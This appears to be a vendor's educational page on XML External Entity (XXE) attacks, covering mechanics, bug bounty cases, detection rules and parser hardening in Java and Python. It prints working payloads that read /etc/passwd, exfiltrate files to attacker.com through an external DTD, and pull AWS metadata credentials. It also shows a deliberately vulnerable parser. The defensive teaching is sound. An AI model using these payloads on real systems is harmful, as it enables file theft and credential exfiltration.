XML External Entity (XXE) Attack
An XML External Entity (XXE) attack exploits vulnerable XML parsers that process external entity declarations within XML input. By injecting a crafted Document Type Definition (DTD) into XML data sent to the application, the attacker forces the server to read local files, perform Server-Side Request Forgery (SSRF), execute denial-of-service attacks, or β in certain configurations β achieve remote code execution. XXE is especially dangerous because XML parsing is ubiquitous: it underlies SOAP APIs, SAML authentication, Office documents, SVG images, RSS feeds, and countless data interchange formats.
How XML External Entity (XXE) Attack Works
XML supports a feature called external entities, defined in a Document Type Definition (DTD). An entity is essentially a variable: <!ENTITY name "value"> defines an internal entity, while <!ENTITY name SYSTEM "file:///etc/passwd"> defines an external entity that loads its value from an external resource β a local file, a URL, or even a network service. When a vulnerable XML parser processes input containing these declarations and then expands the entity reference (&name;) in the document body, it fetches the external resource and includes its content in the parsed output. The attacker doesn't need special access β they simply submit crafted XML to any endpoint that parses XML input.
Identify XML input surfaces
The attacker maps all endpoints that accept or process XML: SOAP/REST API endpoints with Content-Type: application/xml or text/xml, file upload forms that accept DOCX/XLSX/SVG/XML files (all are XML-based), SAML SSO endpoints, RSS/Atom feed importers, XML-RPC endpoints, configuration file importers, and any endpoint that accepts multipart data where one part might be parsed as XML. Even JSON APIs may be vulnerable if the server also accepts XML (many frameworks auto-negotiate Content-Type). The attacker switches Content-Type from application/json to application/xml and submits equivalent XML β if the server processes it, XXE testing begins.
Test for basic XXE with a known file
The attacker submits XML containing an external entity that references a known, readable file: <!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><root>&xxe;</root>. If the parsed response contains the file's content (the /etc/passwd user list), classic XXE is confirmed. On Windows, the test file is C:\Windows\win.ini. If the response doesn't reflect the entity value (the application doesn't echo the parsed XML), the attacker pivots to out-of-band (OOB) XXE, using an HTTP entity that triggers a callback to an attacker-controlled server: <!ENTITY xxe SYSTEM "http://attacker.com/xxe-test"> β a DNS lookup or HTTP request in the attacker's server logs confirms the vulnerability even without visible output.
Exfiltrate data via out-of-band channels
For blind XXE (no direct output), the attacker uses parameter entities to exfiltrate data through HTTP or DNS: (1) Define a parameter entity that reads a local file: <!ENTITY % data SYSTEM "file:///etc/passwd">; (2) Define a second entity that embeds the file content in a URL: <!ENTITY % exfil "<!ENTITY % send SYSTEM 'http://attacker.com/?d=%data;'>">; (3) Host an external DTD on the attacker's server containing these definitions; (4) Reference the external DTD: <!DOCTYPE foo SYSTEM "http://attacker.com/evil.dtd">. The parser fetches the external DTD, processes the chained entity definitions, reads the local file, and sends its contents to the attacker's server as a URL parameter. DNS-based exfiltration works even when HTTP is blocked.
Perform SSRF via XXE
XXE is a powerful SSRF vector. By using entities with http:// or https:// URIs pointing to internal resources, the attacker forces the XML parser to make server-side requests: <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/"> retrieves AWS instance metadata including temporary IAM credentials. <!ENTITY xxe SYSTEM "http://internal-api.corp:8080/admin/users"> accesses internal APIs. The XML parser acts as a proxy, making authenticated requests from the server's network position β bypassing firewalls, VPNs, and network segmentation that would block direct external access.
Denial of service and code execution
XXE enables potent DoS attacks: the 'Billion Laughs' attack (XML bomb) defines nested entities that expand exponentially β 10 levels of 10x expansion produce 10 billion entity copies from a few kilobytes of XML, consuming all available memory and crashing the parser. For code execution, PHP's expect:// wrapper (expect://id) executes system commands when used as an entity URI. Java's XSLT processing can be abused for code execution via embedded scripting. Even without direct code execution, the combination of file reading (extracting credentials) and SSRF (accessing internal services) typically provides a pathway to full server compromise.
Real-World Examples
Facebook XXE via DOCX upload (Bug Bounty)
Security researcher Mohamed Ramadan discovered that Facebook's careers page processed uploaded DOCX resumes through an XML parser vulnerable to XXE. A DOCX file is a ZIP archive containing XML files β by modifying the internal XML to include an external entity pointing to a local file, the researcher read files from Facebook's servers. Facebook confirmed the vulnerability, patched it, and awarded a bug bounty. The case demonstrated that any file format based on XML (DOCX, XLSX, PPTX, ODT, SVG) can be an XXE vector, even when the application doesn't appear to accept raw XML input.
SAML XXE affecting multiple SSO providers
Researchers from Duo Security (now part of Cisco) discovered XXE vulnerabilities in seven SAML SSO libraries across multiple languages (Python, Ruby, PHP, Java). SAML β the protocol underpinning enterprise single sign-on β uses signed XML messages. The vulnerable libraries parsed the XML before validating the signature, allowing attackers to inject XXE payloads into authentication messages. Any application using these libraries for SSO (including OneLogin, Shibboleth deployments, and custom SAML integrations) was vulnerable to authentication bypass, file disclosure, and SSRF. The finding affected thousands of enterprise applications.
Uber XXE via XLSX fare calculation
A researcher discovered that Uber's driver partner portal processed uploaded XLSX spreadsheets with a vulnerable XML parser. By crafting an XLSX file containing XXE payloads in the internal XML documents, the researcher achieved local file reading on Uber's servers. The vulnerability was in the fare calculation import feature where drivers uploaded spreadsheets. Uber awarded a $10,000 bug bounty. The case highlighted how XXE can hide in any feature that processes structured document formats β spreadsheets, word documents, presentations β not just obvious XML APIs.
Impact & Risk Assessment
XXE is rated High (and was a dedicated OWASP Top 10 category in 2017 as A4: XML External Entities) because it provides a versatile toolkit for attackers: local file disclosure reveals credentials, keys, and source code; SSRF enables access to cloud metadata endpoints and internal services; DoS via XML bombs can crash production systems; and in specific configurations, code execution is achievable. The attack surface is deceptively large β XXE isn't limited to explicit XML APIs. Any application processing DOCX, XLSX, SVG, SAML, RSS, SOAP, or configuration files may be vulnerable. The prevalence of XML in enterprise systems (SOAP services, SAML SSO, document processing pipelines) means that XXE continues to affect critical infrastructure even as newer applications move to JSON. Bug bounty programs consistently rank XXE among the top 10 most reported vulnerability classes.
How to Detect XML External Entity (XXE) Attack
Monitor for XXE indicators across multiple layers: (1) WAF rules detecting DOCTYPE declarations, ENTITY definitions, and SYSTEM/PUBLIC keywords in incoming XML payloads β these rarely appear in legitimate application input; (2) Scan for entity references (&xxe;, %) and suspicious URIs in XML content (file://, expect://, php://, http:// pointing to internal IPs or metadata endpoints); (3) Monitor outbound network connections from XML processing services β a parser making HTTP/DNS requests to unexpected destinations indicates XXE or SSRF exploitation; (4) Application-level logging that records XML parsing events and flags any external entity resolution; (5) Memory monitoring on XML processing services β sudden memory spikes indicate XML bomb (Billion Laughs) attacks; (6) Intrusion detection rules for known XXE payloads in HTTP request bodies and multipart upload content.
How to Prevent XML External Entity (XXE) Attack
The primary defense is disabling external entity processing in the XML parser β this single configuration change neutralizes nearly all XXE variants. Implementation varies by language: (1) Java: DocumentBuilderFactory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true) or use defusedxml; (2) Python: use defusedxml library instead of xml.etree, or set forbid_dtd=True, forbid_entities=True, forbid_external=True on the parser; (3) PHP: libxml_disable_entity_loader(true) (PHP < 8.0) or ensure LIBXML_NOENT is never passed to the parser; (4) .NET: XmlReaderSettings.DtdProcessing = DtdProcessing.Prohibit; (5) Ruby/Nokogiri: Nokogiri::XML(input) { |config| config.noent.nonet }. Additionally: validate and sanitize XML input using schemas (XSD), reject XML containing DOCTYPE declarations at the WAF level, convert XML APIs to JSON where possible, keep XML processing libraries updated, and apply least privilege to the service account running XML processing to limit the impact of file disclosure.
Code Examples
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<user>
<name>&xxe;</name>
<email>attacker@example.com</email>
</user>
<!-- Server response includes the contents of /etc/passwd:
<user>
<name>root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...</name>
<email>attacker@example.com</email>
</user>
-->
<!-- Blind XXE via out-of-band exfiltration: -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
%dtd;
]>
<data>&send;</data>
<!-- evil.dtd hosted on attacker's server:
<!ENTITY % payload "<!ENTITY send SYSTEM 'http://attacker.com/exfil?d=%file;'>">
%payload;
-->
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.DocumentBuilder;
import org.w3c.dom.Document;
import java.io.ByteArrayInputStream;
public class XMLProcessor {
// VULNERABLE: Default Java DocumentBuilder allows external entities
public Document parseUnsafe(String xml) throws Exception {
DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
// No security features configured β XXE is possible!
DocumentBuilder builder = factory.newDocumentBuilder();
return builder.parse(new ByteArrayInputStream(xml.getBytes()));
}
// SECURE: Disable DTDs and external entities entirely
public Document parseSafe(String xml) throws Exception {
DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
// Disallow DTDs entirely (the nuclear option β most effective)
factory.setFeature(
"http://apache.org/xml/features/disallow-doctype-decl", true);
// Defense-in-depth: disable external entities even if DTD is somehow allowed
factory.setFeature(
"http://xml.org/sax/features/external-general-entities", false);
factory.setFeature(
"http://xml.org/sax/features/external-parameter-entities", false);
// Disable external DTD loading
factory.setFeature(
"http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
// Disable XInclude processing
factory.setXIncludeAware(false);
factory.setExpandEntityReferences(false);
DocumentBuilder builder = factory.newDocumentBuilder();
return builder.parse(new ByteArrayInputStream(xml.getBytes()));
}
}
# VULNERABLE: Standard library XML parsers are XXE-prone
# import xml.etree.ElementTree as ET # DO NOT USE for untrusted XML
# tree = ET.parse('input.xml') # Allows external entities!
# SECURE: Use the defusedxml library (pip install defusedxml)
import defusedxml.ElementTree as ET
from defusedxml import DefusedXmlException
from defusedxml.common import DTDForbidden, EntitiesForbidden
def parse_xml_safely(xml_string: str) -> dict:
"""Parse XML input with all dangerous features disabled."""
try:
# defusedxml automatically blocks:
# - DTD processing
# - External entity expansion
# - External DTD loading
# - Entity expansion beyond configurable limits
root = ET.fromstring(xml_string)
return {
'tag': root.tag,
'text': root.text,
'children': [
{'tag': child.tag, 'text': child.text}
for child in root
]
}
except DTDForbidden:
raise ValueError('XML with DTD declarations is not allowed')
except EntitiesForbidden:
raise ValueError('XML with entity definitions is not allowed')
except DefusedXmlException as e:
raise ValueError(f'Potentially malicious XML blocked: {e}')
except ET.ParseError as e:
raise ValueError(f'Invalid XML: {e}')
# For DOCX/XLSX/SVG file processing:
def safe_process_docx(file_path: str):
"""Process DOCX files with XXE protection."""
import zipfile
import defusedxml.ElementTree as SafeET
with zipfile.ZipFile(file_path, 'r') as z:
# DOCX internal XML files that could contain XXE
for xml_file in ['word/document.xml', 'word/styles.xml']:
if xml_file in z.namelist():
with z.open(xml_file) as f:
# Parse each internal XML file safely
tree = SafeET.parse(f) # XXE blocked automatically
Frequently Asked Questions
PowerWAF automatically blocks XML External Entity (XXE) Attack at the edge.
Deploy in minutes. No code changes required. Free plan available.
Free plan spots are limited Β· No credit card required